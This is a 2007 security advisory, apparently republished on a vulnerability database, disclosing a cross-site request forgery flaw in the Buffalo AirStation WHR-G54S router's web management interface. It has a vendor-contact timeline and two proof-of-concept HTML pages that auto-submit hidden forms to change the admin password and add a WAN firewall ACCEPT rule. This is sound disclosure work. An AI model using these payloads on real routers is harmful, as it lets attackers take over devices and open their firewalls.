Buffalo AirStation WHR-G54S CSRF vulnerability

Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Louhi Networks Oy -= Security Advisory =- Advisory: Buffalo AirStation WHR-G54S Web Management CSRF vulnerability Release Date: 2007-09-07 Last Modified: 2007-09-07 Authors: Henri Lindberg, Associate of (ISC)&#178; [henri d0t lindberg at louhi d0t fi] Application: Buffalo AirStation Web Management Devices: WHR-G54S Ver.1.20, possibly other Buffalo products Severity: Cross site request forgery in management interface Risk: Moderate Vendor Status: No response from vendor. References: http://www.louhi.fi/advisory/buffalo_070907.txt Overview: During cursory inspection of WHR-G54S it was discovered that a cross site request forgery vulnerability exists in the management interface. Thus, it is possible for an attacker to perform any administrative action in the management interface. These include e.g. changing administrative password or adding new firewall rules. Details: Buffalo AirStation WHR-G54S Ver.1.20 device management interface does not validate the origin of an HTTP request. If attacker is able to make user visit a hostile web page, a device can be controlled by submitting suitable forms. It is possible to add new users for example. Successful attack requires that the attacker knows the management interface address for the target device. As authentication is done using HTTP Basic authentication, exploiting this vulnerability requires more effort compared to forms authentication. Proof of Concept: <html> <body onload="document.CSRF.submit()"> <form name="CSRF" method="post" action=" "style="display:none"> <input name="ap" value="Evil"> <input name="TEST_INPUT" value="1"> <input name="edit_ropass" value="evil"> <input name="edit_ropass2" value="evil"> <input name="ropass" value="live"> <input name="gupass" value=""> </form> </body> </html> Note: ropass value is reversed edit_ropass value. <html> <body onload="document.CSRF.submit()"> <form name="CSRF" method="post" action="" style="display:none"> <input name="sela" value="ACCEPT"> <input name="sel_direction" value="WAN"> <input name="H_sour_ip" value=""> <input name="H_dest_ip" value=""> <input name="H_prt" value="all"> <input name="Do_ADDtop" value="Add%A0%28Head%29"> </form> </body> </html> = attacker's IP address Workaround: Do not browse untrusted websites while using the management interface. Log out after administering the device. More information http://en.wikipedia.org/wiki/Cross-site_request_forgery Disclosure Timeline: XX July 2007 - Discovered the issue 15. August 2007 - Contacted Buffalo 17. August 2007 - Contacted Buffalo again. 7. September 2007 - No response from Vendor. 7. September 2007 - Advisory released Copyright 2007 Louhi Networks Oy. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (MingW32) iEYEAREIAAYFAkbhNJIACgkQ3TZNEGeZkm50SACcCHiOtcfCycfYcxr3lsQPh/J3 Aa8AoKVr6BmKMamG3a7mQCAvO0FV+6y6 =+E8f -----END PGP SIGNATURE-----

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com


Back to Top